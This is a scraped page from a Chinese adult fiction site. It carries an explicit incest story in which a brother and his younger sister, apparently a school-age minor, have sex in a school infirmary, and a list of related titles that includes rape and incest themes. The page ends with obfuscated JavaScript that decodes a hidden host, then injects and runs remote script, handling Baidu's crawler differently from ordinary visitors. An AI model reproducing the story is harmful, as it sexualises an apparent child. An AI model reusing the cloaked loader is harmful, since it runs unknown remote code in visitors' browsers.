返回

受伤的妹妹c68

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



真是好不容易才熬到下课,还有一节课就要放学了。想到放学后和小梅的约 会,哇考!我恨不能狠狠的给那物理老师一拳,让他下节课上不了才好。
一边想入非非一边向厕所走去,蹩足了一泡尿真是难受。
“请问……”一个细小的声音穿入耳鼓。听不出是谁,大概不是在叫我吧。 管他呢,先去方便一下再说。我并没有回头。
“请问,是小雷学长吗?”这次的声音好像大了一点,不过若不是叫我我可 真不会注意。我掉过头,这是谁呀!早不叫完不叫,偏等老子尿急的时候。
“学长好。”一个个头不高、长的很娇小的女生站在我面前。有些发黄的头 髮被梳成两条小辫搭在肩头。大大的眼睛,细细的眉毛弯弯的像两道新月。嘴角 微微的翘着,几颗雀斑让她看起来更是玲珑可爱。
“啊,我就是。你是……??”我搜遍了脑壳也没想起来在哪里认识了这么 个可爱的学妹。
“我是小雪的同学。我叫蓝彩云,学长叫我小云好了。”小云腼腆的说道。
“你找我有什么事吗?”我好奇的问,先忍一忍听她怎么说。
“小雪……小雪她出事了。”小云怯生生的说。
“什么?!雪儿她怎么了?”像是胸口挨了一闷棍,雪儿她……她怎么了? 我一把抓住小云的肩头。
“她上体育课时从平衡木上摔下来了。”小云低着头小声说道。
“啊,她现在怎么样了?”我急忙问道。
“学长,好痛。”小云似乎感到我的两手抓的有些用力了。
“对不起,对不起,那你快说雪儿现在在哪里?”我忙鬆开手,低头问道。
“她在医务室……”我刚才大概是太用力了,小云一副快哭出来的样子。
我急忙掉头往楼下的医务室跑去。雪儿,我的雪儿你怎么这么不小心呢,要 是摔坏了可怎么办啊!
“等等我啊!学长……学长……”脑后传来小云的喊声。
我急奔到医务室门口,房门紧闭着。使劲推了一下推不开,正要敲门时背后 响起小云的喊声。
“学长,刚才医务老师进去了,说不让别人进去打扰。”小云气喘吁吁的跑 到我跟前。
“小云,她怎么会摔下来的?”我问道。看来一时半会儿还进不去呢。
“小雪,她……她从今天早上就没精打采,一副魂不守舍的样子。”小云答 道。
“她病了吗?”我问道C
“好像不是病了,要是病了她会和我说的。我们是最要好的朋友了,以前她 不舒服都会告诉我的。可是这次我问她,她也不说。上课一个人发呆,老师提问 都不知道。”小云说。
“怎么会这样呢,有人欺负她了?”我问。
“没有啊,今天一天我都和她在一块的。不过她好像有什么心事,总也不说 一句话。体育课根本没看老师怎么做的,所以就……”小云说着说着哭了起来。
“啊,没事。有我在这里,雪儿不会有什么事的。你也别哭了,真是谢谢你 呢!”我连忙安慰道。难道雪儿是为了我?昨晚半夜才回家,今天早上也没见到 雪儿。咳。望着哭泣的小云我心里好似一团乱麻。
“学长,小雪总和我说起你。说她有个疼爱她的哥哥,所以我来找你了。” 小云收住哭声小声说道。
“咳,我算什么好哥哥呀……”我长叹一声。
“学长,今天上课小雪一个劲的在本子上写你的名字呢。学长是不是和小雪 吵架了?我知道小雪是很喜欢学长的。”小云抬起头看了我一眼,迅速有把头低 了下去。不过我还是能看见那红润的脸颊。
“啊,是吗?”我不禁心里一阵的酸痛。雪儿爱我爱的那么深。可是我……
“学长?……学长?”小云的呼唤声把我从冥想里拉了回来。
“学长也很喜欢小雪吧?你们兄妹俩的感情真好。可惜我就没有那么好的福 气……”小云说着又掉下两滴晶莹的泪珠。
“……?”她难道想起了什么心事?正要问时,医务室的门打开了。里面走 出来一位年轻的医务老师。穿着一件白色大褂,高窕的身材,现露出女性成熟的 魅力。乌黑的头髮挽在脑后,薄薄的镜片后面一双动人的眼睛。如此美女真是少 见,以前怎么不知道医务室还有这么个漂亮医师。
“老师出来了。”要不是小云的一句话,我差点忘了来此的目的。
“老师您好。”我走上前去礼貌的打了声招呼。
“你是?”女医师疑惑的目光看着我。
“啊,我是小雪的哥哥。她怎么样了?有什么事吗?”我连忙解释道。
“小雪?小雪,噢,里面那个女生吧。”女医师似乎明白了。
“是的是的。她不要紧吧?”我问道。
“你是她的哥哥?她的腿骨折了,可能要休息一段时间。其他的没有什么大 碍,不过她的心情好像不大好。你进去陪陪她,不要多说话。也不要让其他人打 扰,她现在最好休息。我还要去上课,下课我回来要是没有别的症状你再带她回 家。”女医师看了看我扭身走了。
“我先走了,上课已经迟到了。”小云在旁边说道。
“啊,谢谢你了。快点上课去吧!”我说道。
看着小云跑远的身影,我轻轻推开房门。屋里一股浓重的药水味道。迎面是 个屏风,里面啥也看不清。我轻轻的反锁上房门,以免别人打搅。走过屏风看见 可怜的雪儿闭目躺在床上,好像睡着了。
雪儿左腿打着石膏半吊在床边的挂钩上,身上穿着红色的运动衫和短裤。苍 白的小脸在灯光下令我里一阵刺痛。
“哥……哥哥……”一行泪水从紧闭的双眸边缘滑落下来。梦境似乎对她不 公,紧皱的眉头诉说着雪儿对我情意。
“雪儿,我的好雪儿。好妹妹,哥来了。哥在你身边呢。”我急忙跑过去坐 在床头,一手握住雪儿的小手,一手怜惜的抚摸着妹妹的额头。
“雪儿,哥在这里,哥永远在雪儿身边。”望着妹妹若人怜爱的面孔,我低 下头将嘴唇印了上去。一颗泪珠滑过我的脸庞落了下去。
“哥?!”
听到雪儿的声音,我连忙抬起头。
“哥,你怎么来了?”雪儿睁开眼睛,有些不相信的看着我。
“雪儿,是哥呀。我在这里呀雪儿,还痛不痛了?”我连忙问道。
“刚刚还痛,现在不痛了。有哥哥在,雪儿就不觉得痛了。”雪儿紧抓着我 的手忘情的说。
“雪儿好乖,哥哥在这陪着你。等医师回来后咱们就回家去。”我望着雪儿 说。
“哥,你怎么哭了?都怪雪儿不好,害哥哥担心了。”雪儿将我的手捧到脸 旁伤心的哭起来。
“雪儿,雪儿,不要哭了。这么大了还哭好难看。”我安慰道。
“哥,雪儿不哭了。雪儿现在明白了。”雪儿展开眼泪汪汪的美目,看着我 说。
“雪儿,明白什么了?是不是哥哥很坏?”我问道。
“雪儿想通了。”雪儿慢慢的说。
“什么?”我抽出右手替雪儿擦拭着泪水。
“哥哥人这么好,又长的这么帅,当然有好多女孩子喜欢哥哥了。”雪儿微 笑的说,佻皮的眼神扫去了刚才的忧愁。
“雪儿,你在说什么呀。”我问道。
“哥,雪儿想了。只要哥哥心里有雪儿,哪怕一点点就好。雪儿就满足了, 哥哥的心也分给别的女孩吧,不然她们肯定也会伤心的。”雪儿深情的说。
“雪儿,我的好雪儿……”我激动的话都说不出来了。
“哥,你是不是很喜欢小梅姐呀?她长的那么漂亮。”雪儿偷偷的问道。
“啊,雪儿。这……这,是有一点点喜欢啦。”面对雪儿的真诚我连撒谎的 勇气也没有了。
“嘻嘻,哥哥好花心呀!”雪儿笑道。
“好啊,臭雪儿,竟敢笑话我。”我被说的心里说不出的甜美,迅速一个俯 身吻在妹妹的小嘴上。一条温滑的舌头突破了我的牙关,痒痒的骚动着我口腔, 吮吸着柔软的舌尖慾火在我的体内燃烧着。
雪儿似乎察觉了我的变化,伸出只小手按在了我的下身。
“啊,雪儿。不行,这里是学校啊!”我慌的坐起身,怕再下去一发不可收 拾。
“嘻嘻,哥。让雪儿帮你吧,这样多难受呀!别忘了雪儿在哥哥面前可是坏 女孩呦。”雪儿依然不愿停手。
“啊,雪儿……”慾火烧的我再也想不起来什么了,站起身来走到床头。
“哥,我帮你弄出来吧!”妹妹伸出小手打开我裤子前面的拉练,将我的宝 贝从内裤里拽了出来。
“雪儿,快……快帮哥爽一下。”我不顾一切的说。
“遵命!”雪儿抓住我的肉棒认真的套弄起来。
“啊!哥,棒棒越来越大硬耶。雪儿好喜欢。”雪儿看着眼前的肉棒兴奋的 说。
“雪儿,快点……再快点。”我喘息的道。
“哥,雪儿想……想舔舔它行吗?”雪儿一边套动一边抬起头挑逗的问道。
“啊,雪儿。当然可以啊……雪儿,哥好喜欢呢。”我听了雪儿的问话,激 动的颤抖了一下。
“让妹妹嚐嚐哥哥的棒棒好不好吃。”雪儿完全抛开了淑女的面纱,淫蕩的 笑着,低头伸出舌尖在我的大龟头上轻轻的舔了一下。那感觉比手指还要刺激的 多,马眼处随之透出了一滴精水。
“哇,好好呀!哥的棒棒在雪儿手里跳舞呢!”雪儿握着我那不住抖动的肉 棒轻声喊道。
“啊……”我舒服得几乎晕倒在地。
“哥,想不想妹妹用嘴帮你弄呀?”雪儿娇声问道。
“好雪儿,哥哥等不急了。好妹妹,别再逗哥了……快帮哥弄吧!”我急忙 应道。
望着紫红的龟头一点点的塞进妹妹红润的小嘴,我的魂魄几乎爆裂开来。雪 儿热呼呼的口腔包围着我的肉棒,牙齿不断的刮弄着龟头,舌尖在嘴里颤抖着拨 动酸楚的马眼。肉棒在雪儿嘴里慢慢的吐出又慢慢的吞进,强烈的触觉让我不自 觉的挺动着屁股,就这样进进出出,屋里弥漫着淫蕩的气息。紧张的空气包围着 我和妹妹,随时会被人发现的刺激更加激起了我的慾火。
“啊,雪儿,真好……哥快爽死了。”我几乎快喊出来了。
“哥,妹妹的嘴都含不过来了,哥哥的棒棒好大呀!烫烫的,好好味呀!” 雪儿贪婪的吮吸着,不时娇喘的挑逗着我。
随着龟头在湿润的口腔中不断的摩擦,舌尖不断对马眼的骚动,肉棒急剧的 膨胀起来。我渐渐感到有些控制不住了。
“雪儿,好妹妹,哥要出来了……”我抓住雪儿的头,近似崩溃的边缘。
“啊,哥……哥的棒棒插的妹妹嘴里好爽啊。哥,射出来呀!射在雪儿的嘴 里吧!我想要嚐嚐哥哥的精液呀,就让妹妹的小嘴接受哥哥的洗礼吧!”雪儿呜 咽的说,嘴里依然舔食的我的肉棒,发出啧啧的声音。
“噢……啊……”我的肉棒在妹妹加快套动的小手中,如决堤的洪流一股脑 的射入了雪儿的嘴里。妹妹使劲的吮吸着我的精液直到最后一滴淌进她的嘴里, 一股白色的精水混合着妹妹的唾液,沿着她的嘴角顺着下巴流淌下来。
妹妹吐出已经软软的肉棒,抬起头舔了舔嘴唇,抛来一个娇媚的笑容。白色 的精液粘黏在红红的嘴唇上,显得格外的淫乱。
“啊……雪儿。”我长长的出了一口气,掏出手纸帮她擦拭着嘴边的黏液。
“哥,能让哥哥舒心妹妹好高兴。”雪儿捉住我软掉的鸡巴,认真的将上面 残留的精液舔个乾净。
“哥,喜欢雪儿这样做吗?这是雪儿和哥哥之间的秘密。嘻嘻!”雪儿抬头 一边微笑的看着我,一边用手摇了摇我的肉棒。
“雪儿,哥当然喜欢了。对!这是哥哥和我的好妹妹之间的秘密。”我欣慰 的用手指挂了一下雪儿小小的鼻尖。啊,这回一股强烈的尿意沖上来。我连忙将 肉棒塞回裤子里,转身往外走。
“哥,干吗去?”雪儿惊道。
“呵呵,哥尿急。”我难堪的答道。
“嘻嘻,哥哥不害臊,刚尿完又要尿尿。要不要再来雪儿嘴里啊?”雪儿红 着脸笑道。
“死丫头,等我回来再收拾你。”我连忙夺门而出。
“哥,快点回来呀!我想回家了。”身后传来雪儿温情的呼唤声。


评分
相关推荐
3.0分

3.0分 受伤的妹妹-乱伦小说73f

3.0分

3.0分 水-妹-受-难ac6

3.0分

3.0分 为了保护妹妹,受人胁迫的姊姊1ab

3.0分

3.0分 校花正妹享受网友的轮姦e91

3.0分

3.0分 我的妹妹e8b

3.0分

3.0分 我的妹妹e8b

3.0分

3.0分 热情的妹妹97a

3.0分

3.0分 无知的妹妹66a

3.0分

3.0分 无知的妹妹66a

3.0分

3.0分 热情的妹妹97a

3.0分

3.0分 书店的妹妹761

3.0分

3.0分 无知的妹妹66a

3.0分

3.0分 妹妹的烦恼644

3.0分

3.0分 妹妹的糗事aa9

3.0分

3.0分 妹妹的同学112

3.0分

3.0分 手淫的妹妹f18


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};